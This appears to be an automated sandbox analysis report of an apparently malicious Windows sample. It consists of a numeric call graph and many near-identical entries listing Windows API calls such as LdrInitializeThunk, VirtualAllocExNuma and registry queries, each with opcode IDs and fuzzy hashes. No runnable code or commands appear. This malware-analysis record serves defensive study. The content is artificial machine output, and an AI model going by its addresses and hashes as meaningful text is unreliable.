6959f10 43803->43804 43804->43780 43806 6955741 43805->43806 43807 6955764 43805->43807 43806->43788 43809 69557a0 43807->43809 43814 6955730 5 API calls 43807->43814 43818 6955a36 43807->43818 43823 6955a98 43807->43823 43828 695581e 43807->43828 43833 6955720 43807->43833 43846 6955780 43807->43846 43808 6955a6e 43808->43788 43809->43808 43810 6955d5d LdrInitializeThunk 43809->43810 43811 6955d7a 43810->43811 43811->43788 43814->43809 43821 69557d9 43818->43821 43819 6955a6e 43819->43809 43820 6955d5d LdrInitializeThunk 43822 6955d7a 43820->43822 43821->43819 43821->43820 43822->43809 43825 6955ab1 43823->43825 43824 6955bf9 43824->43809 43825->43824 43826 6955d5d LdrInitializeThunk 43825->43826 43827 6955d7a 43826->43827 43827->43809 43831 69557d9 43828->43831 43829 6955a6e 43829->43809 43830 6955d5d LdrInitializeThunk 43832 6955d7a 43830->43832 43831->43829 43831->43830 43832->43809 43834 6955741 43833->43834 43835 6955764 43833->43835 43834->43809 43838 69557a0 43835->43838 43840 6955a36 LdrInitializeThunk 43835->43840 43841 6955780 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 43835->43841 43842 6955730 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 43835->43842 43843 6955720 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 43835->43843 43844 695581e LdrInitializeThunk 43835->43844 43845 6955a98 LdrInitializeThunk 43835->43845 43836 6955a6e 43836->43809 43837 6955d5d LdrInitializeThunk 43839 6955d7a 43837->43839 43838->43836 43838->43837 43839->43809 43840->43838 43841->43838 43842->43838 43843->43838 43844->43838 43845->43838 43851 6955a36 LdrInitializeThunk 43846->43851 43852 6955780 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 43846->43852 43853 6955730 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 43846->43853 43854 6955720 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 43846->43854 43855 695581e LdrInitializeThunk 43846->43855 43856 6955a98 LdrInitializeThunk 43846->43856 43847 6955a6e 43847->43809 43848 6955d5d LdrInitializeThunk 43850 6955d7a 43848->43850 43849 69557a0 43849->43847 43849->43848 43850->43809 43851->43849 43852->43849 43853->43849 43854->43849 43855->43849 43856->43849 43858 6a18457 43857->43858 43858->43857 43859 6a184ec 43858->43859 43861 6a18936 43858->43861 43859->43775 43862 6a1866c 43861->43862 43862->43861 43863 6a188da 43862->43863 43864 f639e1 6 API calls 43862->43864 43865 6a18936 6 API calls 43862->43865 43863->43858 43864->43862 43865->43862 43867 695cc23 43866->43867 43868 6955780 6 API calls 43867->43868 43869 695cfea 43867->43869 43868->43869 43869->43342 43871 695cbc9 43870->43871 43873 695cbec 43870->43873 43871->43342 43872 6955780 6 API calls 43874 695cfea 43872->43874 43873->43872 43873->43874 43874->43342 43876 6a1c699 43875->43876 43880 6a1c6bc 43875->43880 43876->43344 43877 6a1c961 43877->43344 43879 6a126a8 RegQueryValueExW 43879->43880 43880->43877 43880->43879 43881 6a1269c 43880->43881 43882 6a1c9f0 RegOpenKeyExW 43881->43882 43884 6a1cabc 43882->43884 43886 6958cf9 43885->43886 43887 6958d1c 43885->43887 43886->43403 43888 6958d96 43887->43888 43890 f639e1 6 API calls 43887->43890 43888->43403 43889 6959191 43889->43403 43890->43889 43893 6959093 43891->43893 43892 69590c1 43892->43403 43893->43892 43895 f639e1 6 API calls 43893->43895 43894 6959191 43894->43403 43895->43894 43897 6958d57 43896->43897 43898 6958d96 43897->43898 43900 f639e1 6 API calls 43897->43900 43898->43403 43899 6959191 43899->43403 43900->43899 43902 6958ddd 43901->43902 43903 6958dec 43902->43903 43905 f639e1 6 API calls 43902->43905 43903->43403 43904 6959191 43904->43403 43905->43904 43907 6959125 43906->43907 43909 f639e1 6 API calls 43907->43909 43908 6959191 43908->43403 43909->43908 43911 f62d4b 43910->43911 43915 f631f0 43911->43915 43921 f63200 43911->43921 43912 f62d58 43912->43155 43916 f631f5 43915->43916 43920 f639e1 6 API calls 43916->43920 43917 f63272 43918 f632f5 43917->43918 43919 f639e1 6 API calls 43917->43919 43919->43917 43920->43917 43922 f6321b 43921->43922 43926 f639e1 6 API calls 43922->43926 43923 f632f5 43924 f63272 43924->43923 43925 f639e1 6 API calls 43924->43925 43925->43924 43926->43924
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.551411606.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6950000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 511f8da235005596e435ecf087532a6a49aece90b75e2454a277a7162e536dff
                                                    • Instruction ID: fa73984155440557d939f7addf9f29208a41d11fbb6589b1d468436ede1923eb
                                                    • Opcode Fuzzy Hash: 511f8da235005596e435ecf087532a6a49aece90b75e2454a277a7162e536dff
                                                    • Instruction Fuzzy Hash: 9422B230B042058FCB54DBB4D889AAD77F6AF89318F268869E805DB751DF35DC05CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98398
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 04b6a9d0bc26af5e016b1f524a1ecb9334d103a00e528a0680c276b632b81719
                                                    • Instruction ID: 9b6d35097e2746f2eff1c1546bc960a9b07cba720fe21eb2190a52c3d0cb03ba
                                                    • Opcode Fuzzy Hash: 04b6a9d0bc26af5e016b1f524a1ecb9334d103a00e528a0680c276b632b81719
                                                    • Instruction Fuzzy Hash: D8129539902218CFDB68DB64D88C79CB7B2BF4A306F1045E9D55AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 200295572887393a96125adb1ca593bcadd44f10f0fb35972f6939545f1cdaac
                                                    • Instruction ID: 0eaa639225f37633dde7982d52e5ac4fb1ff2454ada268cd920290c3150b919e
                                                    • Opcode Fuzzy Hash: 200295572887393a96125adb1ca593bcadd44f10f0fb35972f6939545f1cdaac
                                                    • Instruction Fuzzy Hash: 5E128579906228CFCB64DB64D88C79CB7B2BF4A305F1045E9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: c74904d42e9cd081fdf5c9c9413700e2108dad5632c92077306899adeb6ef9a8
                                                    • Instruction ID: 7b422adb6d30cd6fbbc51bc2998099c3de2a5843f62451419902ff0748ebb608
                                                    • Opcode Fuzzy Hash: c74904d42e9cd081fdf5c9c9413700e2108dad5632c92077306899adeb6ef9a8
                                                    • Instruction Fuzzy Hash: A3029539906228CFCB64DB64D88C79CB7B2BF4A305F1045E9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: dc4b32083eb7cdc196a5a4821a5b6de52bd53c508e9dba2609de45b52cf5ff60
                                                    • Instruction ID: 5d8eeca6c283ad1c5cb715a939619105308ba66c20eabcc34cf306171a177c66
                                                    • Opcode Fuzzy Hash: dc4b32083eb7cdc196a5a4821a5b6de52bd53c508e9dba2609de45b52cf5ff60
                                                    • Instruction Fuzzy Hash: 5C028539906228CFDB64DB64D88C79CB7B2BF4A305F1045E9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 8dcaf94702a6b576da1e2e0c096204ed2a131145da60266269a2ec558673a1bc
                                                    • Instruction ID: 5ad42cff7909e51f0dfd190d327043db49865c8afe3ba24b1fc9b2ebd5ec9ad7
                                                    • Opcode Fuzzy Hash: 8dcaf94702a6b576da1e2e0c096204ed2a131145da60266269a2ec558673a1bc
                                                    • Instruction Fuzzy Hash: 9F028639906218CFDB64DB64D88C79CB7B2BF4A305F2045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 250ce95959069ee1aa8858d6c86efc01d5f774e0032b7b01c378527338afa488
                                                    • Instruction ID: 91fa3190815b21b6e3763f75c715bb869b00ddf35b803cda08a6d3ec8b40870a
                                                    • Opcode Fuzzy Hash: 250ce95959069ee1aa8858d6c86efc01d5f774e0032b7b01c378527338afa488
                                                    • Instruction Fuzzy Hash: 8D028639906218CFDB64DB64D88C79CB7B2BF4A305F1045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 95f84a1ba56aadee26cb4f6082a193f20f8eaebace3b67538a87652b188812ba
                                                    • Instruction ID: eebcfb54714f199cb38d27b00fd75f0d36a4e7763fffb703b54dc45c2207ce7e
                                                    • Opcode Fuzzy Hash: 95f84a1ba56aadee26cb4f6082a193f20f8eaebace3b67538a87652b188812ba
                                                    • Instruction Fuzzy Hash: FFF18539906228CFDB68DB64D88C79CB7B2BF4A305F1045D9E54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: cdc9e6bc2738d6127b75dbe012353b4890f6583409c334a0fcb35c50414766c1
                                                    • Instruction ID: d3b183ff744248554a5f376b515c097fcc2ff005da083f398b28e09c60a433b9
                                                    • Opcode Fuzzy Hash: cdc9e6bc2738d6127b75dbe012353b4890f6583409c334a0fcb35c50414766c1
                                                    • Instruction Fuzzy Hash: 03F17539906228CFCB64DB64D88C79DB7B2BF4A305F1045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: f5d42a350b5f1e0eb62c0fc6cb097639369048dc990f2855923cbfc7a2a3a36f
                                                    • Instruction ID: 38cc81ee9c3dd9fd14dd9c1ecfe8f1cd8a5170284e22a5fbf04909211d523fcf
                                                    • Opcode Fuzzy Hash: f5d42a350b5f1e0eb62c0fc6cb097639369048dc990f2855923cbfc7a2a3a36f
                                                    • Instruction Fuzzy Hash: 78F17539906228CFCB64DB64D88C79DB7B2BF4A305F2045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: f399b75a4e7c50262a914f66264026ceade5f0696452e48cc575956735c7e850
                                                    • Instruction ID: 676c215681efe043f6a2bb0f46457f8734ac21a47bd1fd84f74649d95d7fe94b
                                                    • Opcode Fuzzy Hash: f399b75a4e7c50262a914f66264026ceade5f0696452e48cc575956735c7e850
                                                    • Instruction Fuzzy Hash: EDF17539906228CFCB64DB64D88C79DB7B2BF4A306F1045D9E54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 776abb9cc57c79488e3812823b23ff52af3f4e10aa1898167d9c78aba176e453
                                                    • Instruction ID: 2967a15cff3666b4939cff6344b270ec6b5952aa2b8ccaa82fb0e25d1283b77a
                                                    • Opcode Fuzzy Hash: 776abb9cc57c79488e3812823b23ff52af3f4e10aa1898167d9c78aba176e453
                                                    • Instruction Fuzzy Hash: ABE18639906228CFCB64DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 19da07a89244ff9c8ce0fad5affc9b0b84894d83412210ab9948422c7162e911
                                                    • Instruction ID: 50077aa092b2b35593cf36abefb8669bcd366fd092ab9b670cdcb0e33b03b2fe
                                                    • Opcode Fuzzy Hash: 19da07a89244ff9c8ce0fad5affc9b0b84894d83412210ab9948422c7162e911
                                                    • Instruction Fuzzy Hash: 02E18539906228CFCB64DB64D88C79DB7B2BF4A306F1045D9E54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: c89a0b1d38eca5f2f7b11dbf4e00fae26798a3bf9b04d34bf146b078c92ebe8e
                                                    • Instruction ID: 93ee3dd05568f10bd50073df8c308c22505391bf74f3887efa7337814e3d19b8
                                                    • Opcode Fuzzy Hash: c89a0b1d38eca5f2f7b11dbf4e00fae26798a3bf9b04d34bf146b078c92ebe8e
                                                    • Instruction Fuzzy Hash: 57E18539906228CFCB64DB64D88C79DB7B2BF4A306F1045D9E54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 911badec4df5a69690fe92c2d6839977144653ad9a37fd0665be7369e127f5cd
                                                    • Instruction ID: aae83ce583ad8e1c5df2f7f665fed68e3e7034427b1012a8574dae139036ea58
                                                    • Opcode Fuzzy Hash: 911badec4df5a69690fe92c2d6839977144653ad9a37fd0665be7369e127f5cd
                                                    • Instruction Fuzzy Hash: 69E18639906228CFCB64DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 2aa60cc5b79f1aaa49621089e304ed35d244a6d6165ff7aa212b84a52325a2a6
                                                    • Instruction ID: d66a5931fc068975a76d068f1aa2d357866ce61d13c4be547210547539952738
                                                    • Opcode Fuzzy Hash: 2aa60cc5b79f1aaa49621089e304ed35d244a6d6165ff7aa212b84a52325a2a6
                                                    • Instruction Fuzzy Hash: 3DD18539906228CFDB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00F60B06
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 5f8fc4ad73e5fd46868c68da1179f7bd059d2eabbbb86f25108897b2eb1fd944
                                                    • Instruction ID: 0cae8cae825213d716cecc66b16139d2b92374406e73b924ce9adfc95e0ad9e6
                                                    • Opcode Fuzzy Hash: 5f8fc4ad73e5fd46868c68da1179f7bd059d2eabbbb86f25108897b2eb1fd944
                                                    • Instruction Fuzzy Hash: 1181F275E042488FDF10CFA9C8847AEBBB1EF49324F24846AE409E7391DB398C45DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 65a94f8d954a624ecd195ce019658905b7694057847b931ad230d26d7b9c68b0
                                                    • Instruction ID: 35ac4e7700e51e20f7e3fab96c5c9fd9ed69a80274dbcca2969dcb0847763240
                                                    • Opcode Fuzzy Hash: 65a94f8d954a624ecd195ce019658905b7694057847b931ad230d26d7b9c68b0
                                                    • Instruction Fuzzy Hash: 7CD18539906228CFCB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 8d8e5867226bb832521ca929efb612bfbfc5568bd9461cba75545500ac955a1b
                                                    • Instruction ID: 693eb7eb62c6fef524be2d8d44302bb93fa5485ec1bf9b0358a445af83bcdc29
                                                    • Opcode Fuzzy Hash: 8d8e5867226bb832521ca929efb612bfbfc5568bd9461cba75545500ac955a1b
                                                    • Instruction Fuzzy Hash: D9D18539906228CFCB64DB64D88C79DB7B2BF4A306F2045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 3b8d4f177cf62cbb1f981b81b62b8f26f892f53dd75b45353febd74e893b2edc
                                                    • Instruction ID: aa4204d85ca98f144e1fbe5df4a7a97d20741ccfbdf4f7bc6ff0c9c805398e6c
                                                    • Opcode Fuzzy Hash: 3b8d4f177cf62cbb1f981b81b62b8f26f892f53dd75b45353febd74e893b2edc
                                                    • Instruction Fuzzy Hash: 6DD18639906228CFDB64DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: c12f06afc38cb31ce046317d73442c68378ba2f74c78a8d960f3d4ce69382b2a
                                                    • Instruction ID: ffb47b9cebb51a637441f0a4084bf6e4b015658e077101a7910fc69de9c1acad
                                                    • Opcode Fuzzy Hash: c12f06afc38cb31ce046317d73442c68378ba2f74c78a8d960f3d4ce69382b2a
                                                    • Instruction Fuzzy Hash: 55C18539906228CFCB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: d8aa4e50bb4bc494116422269b3d5a8213cf20265788688a7d7c2ff575231c8d
                                                    • Instruction ID: b639cf374a78da9e652848e0666ab72f024a53553d838a0d168399c9ba977c4e
                                                    • Opcode Fuzzy Hash: d8aa4e50bb4bc494116422269b3d5a8213cf20265788688a7d7c2ff575231c8d
                                                    • Instruction Fuzzy Hash: C2C18539906228CFCB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: d7307cd0cad39d84433519a5cd8350183f1ba6a69a922f37591422984eac313e
                                                    • Instruction ID: 2a188f24e766c64d90e6daafc63b9bc9887f0f98504c3d59435acff2f53b6355
                                                    • Opcode Fuzzy Hash: d7307cd0cad39d84433519a5cd8350183f1ba6a69a922f37591422984eac313e
                                                    • Instruction Fuzzy Hash: ABB18639906228CFCB68DB64D88C79DB7B2BF4A306F2045D9D54A93350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 407081ab43427c2c75691aec2013e76a1b36700b7508058f43d1ffaf823a21fd
                                                    • Instruction ID: ec73308f3d047763374eda86598056fb451d5224fef7a9991797c05710fc4882
                                                    • Opcode Fuzzy Hash: 407081ab43427c2c75691aec2013e76a1b36700b7508058f43d1ffaf823a21fd
                                                    • Instruction Fuzzy Hash: 0FB18639906228CFCB64DB64D88C79DB7B2BF4A306F1045D9D54A93350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: e54d369cf52f470fbe5d5e56e4f629fa07d34086ddc33b8caec11f6dbf979a41
                                                    • Instruction ID: 48b94333390fab03e040aa0d6e7d919a88daaa965799307f08832fe244ecf338
                                                    • Opcode Fuzzy Hash: e54d369cf52f470fbe5d5e56e4f629fa07d34086ddc33b8caec11f6dbf979a41
